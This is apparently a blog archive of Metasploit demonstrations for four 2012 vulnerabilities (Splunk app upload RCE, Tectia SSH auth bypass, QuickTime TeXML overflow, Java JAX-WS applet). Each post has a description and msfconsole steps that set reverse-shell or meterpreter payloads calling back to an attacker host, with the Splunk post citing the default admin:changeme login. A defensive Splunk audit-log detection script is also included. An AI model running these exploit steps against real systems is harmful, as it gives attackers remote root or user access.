Category Archives: Metasploit

All my posts regarding Metasploit framework, auxiliaries, plugins and exploits.

Splunk 5.0 Custom App Remote Code Execution Metasploit Demo

Timeline :

Vulnerability discovered by Marc Wickenden
Vulnerability details provided by Marc Wickenden on 2012-11-12
Metasploit PoC provided by Marc Wickenden on 2012-11-14

PoC provided by :

@marcwickenden
sinn3r
juan vazquez

Reference(s) :

Splunk: With Great Power Comes Great Responsibility
Abusing Splunk Functionality with Metasploit

Affected version(s) :

All Splunk 5.x versions

Tested on CentOS 5.8 x86 with :

Splunk version 5.0.1, build 143156

Description :

This module exploits a feature of Splunk whereby a custom application can be uploaded through the web-based interface. Through the script search command a user can call commands defined in their custom application, which can include arbitrary Perl or Python code. To abuse this behavior, a valid Splunk user with the admin role is required. By default, this module uses the credential admin:changeme, the default Administrator credential for Splunk. Note that the Splunk web interface runs as SYSTEM on Windows, or as root on Linux, by default. This module has only been tested successfully against Splunk 5.0.

Commands :

use exploit/multi/http/splunk_upload_app_exec
set RHOST 192.168.178.34
set TARGET 0
set PAYLOAD cmd/unix/reverse_perl
set LHOST 192.168.178.26
exploit

ifconfig
id
uname -a
ps
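As an added defender-side example (not code from the original post or from the Metasploit module), the following Python script scans Splunk audit-log search events and flags any search pipeline that invokes the script command described above; the audit line layout and the sample lines are constructed approximations of Splunk's audit.log.

```python
import re

# Constructed sample lines modelled on the shape of Splunk's audit.log search
# events; the field layout is an approximation, not a capture from a real host.
SAMPLE_AUDIT = """\
11-12-2012 10:00:00.000 +0000 INFO  AuditLogger - Audit:[timestamp=11-12-2012 10:00:00.000, user=analyst, action=search, info=granted, search='search index=web status=500 | stats count by host'][n/a]
11-12-2012 10:00:05.000 +0000 INFO  AuditLogger - Audit:[timestamp=11-12-2012 10:00:05.000, user=admin, action=search, info=granted, search='| script perl msf_exec'][n/a]
11-12-2012 10:00:07.000 +0000 INFO  AuditLogger - Audit:[timestamp=11-12-2012 10:00:07.000, user=admin, action=search, info=granted, search='search index=main "| script"'][n/a]
11-12-2012 10:00:09.000 +0000 INFO  AuditLogger - Audit:[timestamp=11-12-2012 10:00:09.000, user=admin, action=search, info=granted, search='search index=main |   SCRIPT python helper arg1'][n/a]
"""

# Pull the user, action and SPL string out of one audit line.
AUDIT_RE = re.compile(
    r"user=(?P<user>[^,\]]+),.*?action=(?P<action>[^,\]]+),"
    r".*?search='(?P<search>.*?)'(?=,|\])"
)
QUOTED = re.compile(r'"[^"]*"')


def piped_commands(search: str) -> list:
    """Return the command name that opens each piped stage of an SPL string.
    Double-quoted literals are blanked first so that the text "| script"
    inside a quoted search term is not mistaken for a real pipeline stage."""
    cleaned = QUOTED.sub('""', search)
    stages = cleaned.split("|")[1:]  # stage 0 is the implicit 'search' command
    return [stage.split()[0].lower() for stage in stages if stage.split()]


def find_script_searches(log_text: str) -> list:
    """Return (user, search) for every audited search that invokes the 'script'
    command, which runs Perl/Python code shipped inside an app on the server."""
    hits = []
    for line in log_text.splitlines():
        m = AUDIT_RE.search(line)
        if not m or m.group("action") != "search":
            continue
        if "script" in piped_commands(m.group("search")):
            hits.append((m.group("user"), m.group("search")))
    return hits


if __name__ == "__main__":
    for user, search in find_script_searches(SAMPLE_AUDIT):
        print(f"ALERT: user {user} ran a script command: {search}")
```

Any hit from an account that still uses the default admin credential, or that coincides with an app upload through the web interface, is the sequence this module relies on.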

Tectia SSH Server Authentication Bypass Metasploit Demo

Timeline :

Vulnerability discovered by @kingcope
Vulnerability disclosed by @kingcope on 2012-12-01
Metasploit PoC on 2012-12-04

PoC provided by :

kingcope
bperry
sinn3r

Reference(s) :

Full Disclosure
Tectia Support

Affected version(s) :

SSH Tectia Server 6.0.4 to 6.0.20
SSH Tectia Server 6.1.0 to 6.1.12
SSH Tectia Server 6.2.0 to 6.2.5
SSH Tectia Server 6.3.0 to 6.3.2

Tested on CentOS 5.8 x86 with :

SSH Tectia Server 6.3.2-33

Description :

This module exploits a vulnerability in Tectia SSH server for Unix-based platforms. The bug is caused by an SSH2_MSG_USERAUTH_PASSWD_CHANGEREQ request sent before password authentication, allowing any remote user to bypass the login routine and then gain access as root.

Commands :

use exploit/unix/ssh/tectia_passwd_changereq
set RHOST 192.168.178.34
set PAYLOAD cmd/unix/interact
exploit

id
uname -a
/sbin/ifconfig

CVE-2012-3752 Apple QuickTime TeXML Vulnerability Metasploit Demo

Timeline :

Vulnerability reported to vendor by Arezou Hosseinzad-Amirkhizi
Coordinated public release of the vulnerability on 2012-11-05
Metasploit PoC provided by juan vazquez on 2012-11-22

PoC provided by :

Arezou Hosseinzad-Amirkhizi
juan vazquez

Reference(s) :

CVE-2012-3752
OSVDB-87087
BID-56557
HT5581

Affected version(s) :

QuickTime 7.7.2 and earlier for Windows

Tested on Windows XP Pro SP3 with :

QuickTime 7.7.2
Firefox 3.5.1

Description :

This module exploits a vulnerability found in Apple QuickTime. When handling a TeXML file, it is possible to trigger a stack-based buffer overflow and then gain arbitrary code execution in the context of the user. This is due to the QuickTime3GPP.gtx component not handling certain Style subfields properly, such as the font-table field, which is used to trigger the overflow in this module. Because of QuickTime restrictions when handling font-table fields, only bytes 0x31-0x39 can be used to overflow, so at the moment no DEP/ASLR bypass has been provided. The module has been tested successfully on IE6 and IE7 browsers (Windows XP and Vista).

Commands :

use exploit/windows/browser/apple_quicktime_texml_font_table
set SRVHOST 192.168.178.26
set TARGET 3
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

sessions -i 1

getuid
sysinfo

CVE-2012-5076 Java Applet JAX-WS Remote Code Execution Metasploit Demo

Timeline :

Vulnerability patched by Oracle in the October 2012 CPU
Vulnerability discovered being exploited in the wild by @kafeine on 2012-11-09
Metasploit PoC provided by juan vazquez on 2012-11-11

PoC provided by :

Unknown
juan vazquez

Reference(s) :

CVE-2012-5076
OSVDB-86363
BID-56054
Oracle October 2012 CPU
Cool EK : “Hello my friend…”

Affected version(s) :

Java 1.7.0_07-b10 and earlier

Tested on Windows XP Pro SP3 with :

Java 1.7.0_07-b10

Description :

This module abuses the JAX-WS classes from a Java Applet to run arbitrary Java code outside of the sandbox as exploited in the wild in November of 2012. The vulnerability affects Java version 7u7 and earlier.

Commands :

use exploit/multi/browser/java_jre17_jaxws
set SRVHOST 192.168.178.26
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

sessions -i 1

getuid
sysinfo